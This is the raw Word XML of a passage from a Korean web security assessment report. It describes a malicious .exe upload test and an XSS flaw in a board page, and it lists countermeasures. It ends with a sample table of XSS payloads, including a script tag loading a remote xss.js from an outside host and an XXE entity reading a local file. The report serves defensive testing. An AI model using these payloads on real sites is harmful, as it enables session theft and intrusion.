        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00226BC4" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="00226BC4" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidR="00E638FE" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00226BC4" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00226BC4" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD5F2F" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>exe파일이 업로드 되었는지 다운로드 받아 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00226BC4" w:rsidRPr="00C97C1E" w:rsidRDefault="005B7E78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  <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18E9D5F7" wp14:editId="5DC2179B">
                <wp:extent cx="4858385" cy="3059430"/>
                <wp:effectExtent l="19050" t="19050" r="18415" b="26670"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385" cy="3059430"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4858385" cy="3059430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" t="28214" r="48927" b="22060"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4858385" cy="305943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2467155" y="457200"/>
                            <a:ext cx="2260120" cy="181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67419" y="2855343"/>
                            <a:ext cx="1189990" cy="1466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CFCA8" id="그룹 23" o:spid="_x0000_s1026" style="width:382.55pt;height:240.9pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="48583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">
                <v:shape id="그림 12" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:48583;height:30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+ZjfBAAAA2wAAAA8AAABkcnMvZG93bnJldi54bWxET99rwjAQfhf2P4Qb7M2muuFG1yhDEAd7&#10;ELvt/WhubWlyKU3UzL/eCIJv9/H9vHIVrRFHGn3nWMEsy0EQ10533Cj4+d5M30D4gKzROCYF/+Rh&#10;tXyYlFhod+I9HavQiBTCvkAFbQhDIaWvW7LoMzcQJ+7PjRZDgmMj9YinFG6NnOf5QlrsODW0ONC6&#10;pbqvDlYBfmG345c+N7+z9Xk4bJ9fTWSlnh7jxzuIQDHcxTf3p07z53D9JR0g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+ZjfBAAAA2wAAAA8AAAAAAAAAAAAAAAAAnwIA&#10;AGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPcAAACNAwAAAAA=&#10;" stroked="t" strokecolor="windowText" strokeweight=".5pt">
                  <v:stroke joinstyle="round"/>
                  <v:imagedata r:id="rId17" o:title="" croptop="18490f" cropbottom="14457f" cropleft="469f" cropright="32065f"/>
                  <v:path arrowok="t"/>
                </v:shape>
                <v:rect id="직사각형 21" o:spid="_x0000_s1028" style="position:absolute;left:24671;top:4572;width:22601;height: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<v:rect id="직사각형 22" o:spid="_x0000_s1029" style="position:absolute;left:2674;top:28553;width:11900;height:1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Jo8MA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBSE74L/ITzBi2hqF0SqUVRQZA/Cunvx9mye&#10;bbF5KUm09d9vFoQ9DjPzDbNcd6YWT3K+sqxgOklAEOdWV1wo+Pnej+cgfEDWWFsmBS/ysF71e0vM&#10;tG35i57nUIgIYZ+hgjKEJpPS5yUZ9BPbEEfvZp3BEKUrpHbYRripZZokM2mw4rhQYkO7kvL7+WEU&#10;XA8Xt5tvPw7hMZpF9L34pFOr1HDQbRYgAnXhP/xuH7WCNI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Jo8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226BC4" w:rsidRPr="00922158" w:rsidRDefault="00226BC4" w:rsidP="00226BC4">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="437" w:name="_Toc48909158"/>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[그림 3</w:t>
      </w:r>
      <w:r w:rsidR="00EA4BB0" w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00EA4BB0" w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00EA4BB0" w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ [그림_3- \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00EA4BB0" w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000411AE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00EA4BB0"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DD5F2F" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>exe 파일 다운로드</w:t>
      </w:r>
      <w:bookmarkEnd w:id="437"/>
    </w:p>
    <w:p w:rsidR="00226BC4" w:rsidRPr="00C97C1E" w:rsidRDefault="00226BC4" w:rsidP="00226BC4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E97606" w:rsidRPr="00C97C1E" w:rsidRDefault="00E97606" w:rsidP="00226BC4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00226BC4" w:rsidRPr="00C97C1E" w:rsidRDefault="00226BC4" w:rsidP="00226BC4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00226BC4" w:rsidRPr="00C97C1E" w:rsidRDefault="00226BC4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38" w:name="_Toc48909036"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>보안대책</w:t>
      </w:r>
      <w:bookmarkEnd w:id="438"/>
    </w:p>
    <w:p w:rsidR="00BF7FD4" w:rsidRPr="00922158" w:rsidRDefault="00226BC4" w:rsidP="00BF7FD4">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200"/>
        <w:ind w:leftChars="425" w:left="850"/>
      </w:pPr>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00DD5F2F" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>사용자 입력 값에 대한 검증 로직을 추가 및 실행 제한 설정을 더욱 강화함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF7FD4" w:rsidRPr="00922158" w:rsidRDefault="008E1230" w:rsidP="008E1230">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="525" w:left="1050"/>
      </w:pPr>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>예:</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t>lash</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>파일,</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> avi </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>동영상 파일,</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> exe </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>실행 파일 등 악성코드가 포함될 수 있는 콘텐츠를 삽입 또는 업로드 하지 못하게 필터링 적용</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF7FD4" w:rsidRPr="00922158" w:rsidRDefault="00BF7FD4" w:rsidP="00226BC4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악성 콘텐츠가 삽입되어 있는 경우,</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>해당 페이지에 대하여 증거자료(화면,</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>소스 등)을 남기고, 삽입된 악성 콘텐츠를 삭제 또는 페이지 삭제 등을 실시함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF7FD4" w:rsidRPr="00922158" w:rsidRDefault="00BF7FD4" w:rsidP="00226BC4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</w:t>
      </w:r>
      <w:r w:rsidR="008E1230" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 주기적으로 업로드 된 파일을 대상으로 바이러스 검사 실시</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD5F2F" w:rsidRPr="00922158" w:rsidRDefault="00DD5F2F" w:rsidP="00226BC4">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD5F2F" w:rsidRPr="00C97C1E" w:rsidRDefault="00DD5F2F" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="439" w:name="_Toc48909037"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>크로스 사이트 스크립팅</w:t>
      </w:r>
      <w:r w:rsidR="00681843" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00681843" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cross-site scripting)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="439"/>
    </w:p>
    <w:p w:rsidR="00DD5F2F" w:rsidRPr="00C97C1E" w:rsidRDefault="00DD5F2F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DD5F2F" w:rsidRPr="00C97C1E" w:rsidRDefault="00DD5F2F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DD5F2F" w:rsidRPr="00C97C1E" w:rsidRDefault="00DD5F2F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DD5F2F" w:rsidRPr="00C97C1E" w:rsidRDefault="00DD5F2F" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD5F2F" w:rsidRPr="00C97C1E" w:rsidRDefault="00DD5F2F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40" w:name="_Toc48909038"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>취약점 정의</w:t>
      </w:r>
      <w:bookmarkEnd w:id="440"/>
    </w:p>
    <w:p w:rsidR="00DD5F2F" w:rsidRPr="00922158" w:rsidRDefault="00DD5F2F" w:rsidP="00DD5F2F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Pr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>웹 어플리케이션에서 사용자 입력 인수 값에 대한 필터링이 제대로 이루어지 않을 경우,</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>사용자 인수 값을 받는 웹 사이트 게시판, URL 등에 악의적인 스크립트(자바스크립트,</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> VB </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>스크립트,</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> ActiveX, </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>플래시 등)</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve">를 </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>삽입하여 게시글이나 이메일을 읽는 사용자의 쿠키(세션)를 도용하거나 악성코드(</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve">URL </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>리다이렉트)를 유포할 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD5F2F" w:rsidRPr="00C97C1E" w:rsidRDefault="00DD5F2F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41" w:name="_Toc48909039"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>상세분석</w:t>
      </w:r>
      <w:bookmarkEnd w:id="441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DD5F2F" w:rsidRPr="00922158" w:rsidTr="008E1230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DD5F2F" w:rsidRPr="00922158" w:rsidRDefault="00DD5F2F" w:rsidP="008E123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DD5F2F" w:rsidRPr="00922158" w:rsidRDefault="00DD5F2F" w:rsidP="008E1230">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
            </w:pPr>
            <w:r w:rsidRPr="00922158">
              <w:t>* m_write.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD5F2F" w:rsidRPr="00922158" w:rsidTr="008E1230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DD5F2F" w:rsidRPr="00922158" w:rsidRDefault="00DD5F2F" w:rsidP="008E123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DD5F2F" w:rsidRPr="00922158" w:rsidRDefault="00DD5F2F" w:rsidP="00E97606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rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r w:rsidR="00BF7FD4" w:rsidRPr="00922158">
              <w:t>HTML</w:t>
            </w:r>
            <w:r w:rsidR="00BF7FD4" w:rsidRPr="00922158">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>사용을 할 수 있는 게시판이 존재해,</w:t>
            </w:r>
            <w:r w:rsidR="00BF7FD4" w:rsidRPr="00922158">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00E97606" w:rsidRPr="00922158">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">XSS공격을 </w:t>
            </w:r>
            <w:r w:rsidRPr="00922158">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>할 수 있</w:t>
            </w:r>
            <w:r w:rsidR="00BF7FD4" w:rsidRPr="00922158">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>음</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BF7FD4" w:rsidRPr="00922158" w:rsidRDefault="00BF7FD4" w:rsidP="00DD5F2F">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD5F2F" w:rsidRPr="00C97C1E" w:rsidRDefault="00BF7FD4" w:rsidP="00DD5F2F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DD5F2F" w:rsidRPr="00C97C1E" w:rsidRDefault="00DD5F2F" w:rsidP="00DD5F2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E97606" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>html을 이용한 XSS</w:t>
      </w:r>
      <w:r w:rsidR="00E97606" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E97606" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>공격 시도</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD5F2F" w:rsidRPr="00C97C1E" w:rsidRDefault="00E97606" w:rsidP="00DD5F2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739140</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1916430" cy="209550"/>
                <wp:effectExtent l="0" t="0" r="26670" b="1905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A8627" id="직사각형 33" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:84.6pt;margin-top:58.2pt;width:150.9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" filled="f" strokecolor="red" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4858385" cy="2988000"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="222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25910" r="29359" b="30388"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860295" cy="29891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F2F" w:rsidRPr="00922158" w:rsidRDefault="00DD5F2F" w:rsidP="00DD5F2F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="442" w:name="_Toc48909159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7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E97606" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidR="00E97606" w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E97606" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>공격 시도</w:t>
      </w:r>
      <w:bookmarkEnd w:id="442"/>
    </w:p>
    <w:p w:rsidR="00DD5F2F" w:rsidRPr="00922158" w:rsidRDefault="00DD5F2F" w:rsidP="00DD5F2F"/>
    <w:p w:rsidR="00DD5F2F" w:rsidRPr="00C97C1E" w:rsidRDefault="00DD5F2F" w:rsidP="00DD5F2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</w:t>
      </w:r>
      <w:r w:rsidR="00E638FE" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>2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>exe파일이 업로드 되었는지 다운로드 받아 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD5F2F" w:rsidRPr="00C97C1E" w:rsidRDefault="00E97606" w:rsidP="00DD5F2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  <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54677A83" wp14:editId="20D3DA52">
                <wp:extent cx="4859655" cy="3059430"/>
                <wp:effectExtent l="19050" t="19050" r="17145" b="26670"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3059430"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4859655" cy="3059430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2" r="31848" b="55257"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4859655" cy="305943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직사각형 34"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3286125" y="41910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6AC42" id="그룹 35" o:spid="_x0000_s1026" style="width:382.65pt;height:240.9pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="48596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">
                <v:shape id="그림 30" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:48596;height:30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fDfBAAAA2wAAAA8AAABkcnMvZG93bnJldi54bWxET91qwjAUvhf2DuEMdmfTuaFSjSID3Zig&#10;WPsAh+bYRpuT0kTt3n65ELz8+P7ny9424kadN44VvCcpCOLSacOVguK4Hk5B+ICssXFMCv7Iw3Lx&#10;Mphjpt2dD3TLQyViCPsMFdQhtJmUvqzJok9cSxy5k+sshgi7SuoO7zHcNnKUpmNp0XBsqLGlr5rK&#10;S361CnZ8lpPie78uNqvfY7q9ms/8bJR6e+1XMxCB+vAUP9w/WsFHXB+/xB8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LfDfBAAAA2wAAAA8AAAAAAAAAAAAAAAAAnwIA&#10;AGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPcAAACNAwAAAAA=&#10;" stroked="t" strokecolor="windowText" strokeweight=".5pt">
                  <v:stroke joinstyle="round"/>
                  <v:imagedata r:id="rId20" o:title="" cropbottom="36213f" cropleft="14963f" cropright="20872f"/>
                  <v:path arrowok="t"/>
                </v:shape>
                <v:rect id="직사각형 34" o:spid="_x0000_s1028" style="position:absolute;left:32861;top:4191;width:266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kc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kc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DD5F2F" w:rsidRPr="00922158" w:rsidRDefault="00DD5F2F" w:rsidP="00DD5F2F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="443" w:name="_Toc48909160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8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E97606" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>XSS 공격 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="443"/>
    </w:p>
    <w:p w:rsidR="00DD5F2F" w:rsidRPr="00C97C1E" w:rsidRDefault="00DD5F2F" w:rsidP="00DD5F2F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BF7FD4" w:rsidRPr="00C97C1E" w:rsidRDefault="00BF7FD4" w:rsidP="00BF7FD4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DD5F2F" w:rsidRPr="00C97C1E" w:rsidRDefault="00DD5F2F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44" w:name="_Toc48909040"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>보안대책</w:t>
      </w:r>
      <w:bookmarkEnd w:id="444"/>
    </w:p>
    <w:p w:rsidR="00DD5F2F" w:rsidRPr="00922158" w:rsidRDefault="00DD5F2F" w:rsidP="00DD5F2F">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="425" w:left="850"/>
      </w:pPr>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00E97606" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>웹 사이트의 게시판,</w:t>
      </w:r>
      <w:r w:rsidR="00E97606" w:rsidRPr="00922158">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E97606" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>자료실,</w:t>
      </w:r>
      <w:r w:rsidR="00E97606" w:rsidRPr="00922158">
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r w:rsidR="00E97606" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>등에서</w:t>
      </w:r>
      <w:r w:rsidR="00BF7FD4" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 사용자로부터 입력 받는 인수 값에 대해 검증 로직을 추가</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF7FD4" w:rsidRPr="00922158" w:rsidRDefault="00BF7FD4" w:rsidP="00DD5F2F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t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>인수 값이 입력이 되더라도 실행되지 않게 함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF7FD4" w:rsidRPr="00922158" w:rsidRDefault="00BF7FD4" w:rsidP="00DD5F2F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 xml:space="preserve">- 부득이하게 게시판에 HTML을 사용하는 경우 </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve">HTML </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>코드 중 필요한 코드에 대해서만 입력 가능하도록 설정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E1230" w:rsidRPr="00922158" w:rsidRDefault="008E1230" w:rsidP="00DD5F2F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XSS를 유발할 수 있는 스크립트</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a7"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="850" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8166"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E1230" w:rsidRPr="00C97C1E" w:rsidTr="008E1230">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr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;SCRIPT a=";&gt;';&gt;"; SRC=";http://ha.ckers.org/xss.js";&gt;;&lt;;/SCRIPT&gt;;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;A HREF=";http://66.102.7.147/";&gt;;XSS&lt;;/A&gt;;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?xml version="1.0" encoding="ISO-8859-1"?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM "file:///dev/random"&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;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script&gt;alert('XSS')&lt;/script&gt;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%3cscript%3ealert('XSS')%3c/script%3e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%22%3e%3cscript%3ealert('XSS')%3c/script%3e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IMG SRC="javascript:alert('XSS');"&gt;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;TABLE&gt;;&lt;;TD BACKGROUND=";javascript:alert(';XSS';)";&gt;;&lt;;/TD&gt;;&lt;;/TABLE&gt;;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;HTML xmlns:xss&gt;;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table&gt;&lt;TD BACKGROUND="javascript:document.vulnerable=true;"&gt;</w:t>
            </w:r>
          </w:p>
